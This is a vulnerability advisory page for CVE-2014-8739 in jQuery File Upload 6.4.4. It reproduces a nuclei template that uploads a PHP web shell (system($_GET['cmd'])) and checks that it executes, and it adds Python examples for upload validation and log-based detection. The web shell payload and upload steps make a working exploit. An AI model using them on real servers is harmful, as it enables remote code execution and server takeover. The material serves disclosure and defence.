jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability information

Name: jQuery File Upload 6.4.4 - Unrestricted File Upload

Identifiers:

  • CVE: CVE-2014-8739

Type: File upload

Severity: Critical

Description: jQuery File Upload is a popular file upload plugin, widely used in websites and web applications to implement user file uploads. Because it is easy to integrate and flexible, it has been adopted in many enterprise services and web application components. The plugin lets users upload files to the server through a simple interface and supports many file types and sizes. Version 6.4.4, however, contains a critical vulnerability that allows an attacker to upload arbitrary files, including malicious PHP files, leading to remote code execution.

The technical root cause is that server/php/UploadHandler.php does not strictly validate the type of uploaded files. An attacker can bypass the client-side checks and upload a PHP file directly to the server. Because the server does not restrict the file type, the uploaded PHP file is stored in a web-served directory and executed when requested, so the attacker can run arbitrary code on the server. This class of flaw is known as unrestricted file upload (CWE-434) and results from improper handling of user-supplied input.

The impact is severe: a remote attacker needs no authentication to upload and execute malicious code and take full control of the affected web server. From there the attacker can steal sensitive data, deface the site, or use the server as a pivot for further attacks. Because exploitation is simple and the effect is total, the vulnerability is rated Critical (CVSS 3.1 base score 9.8). To prevent such attacks, upgrade to a version of jQuery File Upload that fixes this issue, enforce strict server-side validation of file types using a whitelist of allowed extensions, and restrict permissions on the upload directory so that the web server does not execute files stored there; the third step of the PoC below only succeeds when the uploaded .php file is actually executed on request.
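The server-side check the remediation above calls for, as an added Python example that is not code from the jQuery File Upload project (whose handler is PHP): a whitelist-based validator placed beside an accept-everything check of the kind that lets `{{randstr}}.php` through. The sample filenames and bodies are constructed, and `weak_accept`, `validate_upload`, `stored_name` and `run_samples` are names chosen here.

```python
import os
import re
import secrets

# Added example (not jQuery File Upload project code). Models the defect the
# page describes: the PHP handler accepted any filename, so a "<name>.php"
# upload landed in the web-served files/ directory and was executed on request.

# An accept-everything pattern: every filename matches, so .php passes.
ACCEPT_ALL = re.compile(r".+$", re.I)

# Hardened policy for a hypothetical image-upload endpoint.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Extensions a typical PHP server will execute; rejected anywhere in the
# extension chain (shell.php.jpg) and regardless of case (SHELL.PHP).
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
# Leading bytes expected for each allowed type, so the body must agree with
# the extension (a PHP script renamed to .png is rejected).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_accept(filename: str) -> bool:
    """The vulnerable shape: a regex that matches any name accepts any name."""
    return ACCEPT_ALL.search(filename) is not None


def validate_upload(filename: str, body: bytes) -> tuple[bool, str]:
    """Return (accepted, reason-or-extension). The client's Content-Type
    header is deliberately not an input: it is attacker-controlled."""
    # Drop any directory component the client supplied.
    base = os.path.basename(filename.replace("\\", "/"))
    # NUL and other control characters have been used to truncate names in
    # older runtimes ("shell.php\x00.jpg"); refuse them outright.
    if any(ord(c) < 0x20 for c in base):
        return False, "control character in filename"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing or empty extension"
    chain = parts[1:]
    if any(e in EXECUTABLE_EXT for e in chain):
        return False, "executable extension in chain"
    ext = chain[-1]
    if ext not in ALLOWED_EXT:
        return False, f".{ext} not in whitelist"
    if not body.startswith(MAGIC[ext]):
        return False, "body does not match declared type"
    # Defence in depth: a valid image that also carries a PHP open tag is a
    # polyglot aimed at a handler that executes by content rather than name.
    if b"<?php" in body or b"<?=" in body:
        return False, "PHP open tag inside body"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen name; the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples: (client-supplied filename, first bytes of the body).
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
JPG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF"
SAMPLES = [
    ("{{randstr}}.php", b"<?php echo 'x'; system($_GET['cmd']); ?>"),
    ("shell.php.jpg", JPG_HEAD),
    ("SHELL.PHTML", b"<?php phpinfo();"),
    ("shell.php\x00.jpg", JPG_HEAD),
    ("../../evil.png", PNG_HEAD),   # path stripped, then stored under stored_name()
    ("photo.png", b"<?php echo 1;"),
    ("holiday.jpg", JPG_HEAD),
]


def run_samples() -> dict[str, tuple[bool, bool]]:
    """Map each sample to (accept-all policy accepts, hardened policy accepts)."""
    return {name: (weak_accept(name), validate_upload(name, body)[0])
            for name, body in SAMPLES}


if __name__ == "__main__":
    for name, (weak, hard) in run_samples().items():
        print(f"{name!r:28} accept-all={weak!s:5} hardened={hard}")
```

The accept-all policy admits every sample, including the `.php` payload from the PoC; the hardened policy admits only the two genuine images, and even those are written under a server-generated name, so nothing the client chose influences the path on disk.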

Vendor: jquery_file_upload_project

Product: jQuery File Upload

Affected version: 6.4.4

Source: https://github.com/projectdiscovery/nuclei-templates/blob/8e1309a4dd5e28c99cfc82f1032927c9eb76d00d/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
      system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950
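The three-step sequence the template drives (GET the endpoint, POST a .php file, GET it back from server/php/files/) leaves a recognisable trace in web-server access logs. The following is an added detection example, not part of the template or the page, run over constructed combined-format log lines; the client addresses, timestamps and uploaded file name are made up, the default paths /server/php/ and /server/php/files/ are taken from the template, and `parse_line`, `detect` and `Alert` are names chosen here.

```python
import re
from dataclasses import dataclass

# Added example, not part of the nuclei template or the page. Constructed
# access-log lines: documentation-range IPs, made-up timestamps and file name.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jul/2025:10:00:01 +0000] "GET /server/php/ HTTP/1.1" 200 12
203.0.113.7 - - [29/Jul/2025:10:00:02 +0000] "POST /server/php/ HTTP/1.1" 200 143
203.0.113.7 - - [29/Jul/2025:10:00:03 +0000] "GET /server/php/files/a8f3k2.php HTTP/1.1" 200 9
203.0.113.7 - - [29/Jul/2025:10:00:09 +0000] "GET /server/php/files/a8f3k2.php?cmd=id HTTP/1.1" 200 61
198.51.100.23 - - [29/Jul/2025:10:01:00 +0000] "POST /server/php/ HTTP/1.1" 200 160
198.51.100.23 - - [29/Jul/2025:10:01:05 +0000] "GET /server/php/files/holiday.jpg HTTP/1.1" 200 48211
192.0.2.9 - - [29/Jul/2025:10:02:00 +0000] "GET /server/php/files/old.php HTTP/1.1" 403 199
"""

# Combined log format: client, identity, user, [timestamp], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Paths under the plugin's default upload directory that end in a server-side
# script extension, with or without a query string.
SCRIPT_IN_FILES = re.compile(
    r'^/server/php/files/[^?]*\.(?:php\d?|phtml|phar)(?:$|\?)', re.I)
UPLOAD_ENDPOINT = "/server/php/"


@dataclass
class Alert:
    ip: str
    ts: str
    path: str
    kind: str        # "upload_then_execute" or "script_served_from_uploads"
    cmd_param: bool  # query string carried a cmd= parameter, as in the PoC payload


def parse_line(line: str):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text: str) -> list[Alert]:
    """Single pass: remember each client's last successful POST to the upload
    endpoint, then flag any 200 response for a script under files/ (rated
    higher when the same client uploaded earlier in the log)."""
    last_upload: dict[str, str] = {}
    alerts: list[Alert] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ok = rec["status"] == "200"
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT and ok:
            last_upload[rec["ip"]] = rec["ts"]
            continue
        # A script in the upload directory should never be served with 200;
        # a 403 (execution and serving disabled for files/) is the expected case.
        if ok and SCRIPT_IN_FILES.match(rec["path"]):
            kind = ("upload_then_execute" if rec["ip"] in last_upload
                    else "script_served_from_uploads")
            alerts.append(Alert(rec["ip"], rec["ts"], rec["path"], kind,
                                re.search(r"[?&]cmd=", rec["path"]) is not None))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

On the sample the benign image upload from 198.51.100.23 and the blocked 403 request produce nothing, while the two fetches of a8f3k2.php from 203.0.113.7 are flagged, the second with `cmd_param=True` because the query string carries the parameter the PoC payload reads.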


http://example.com/2025/07/29/github_1593535320/
Author: lianccc
Published: 29 July 2025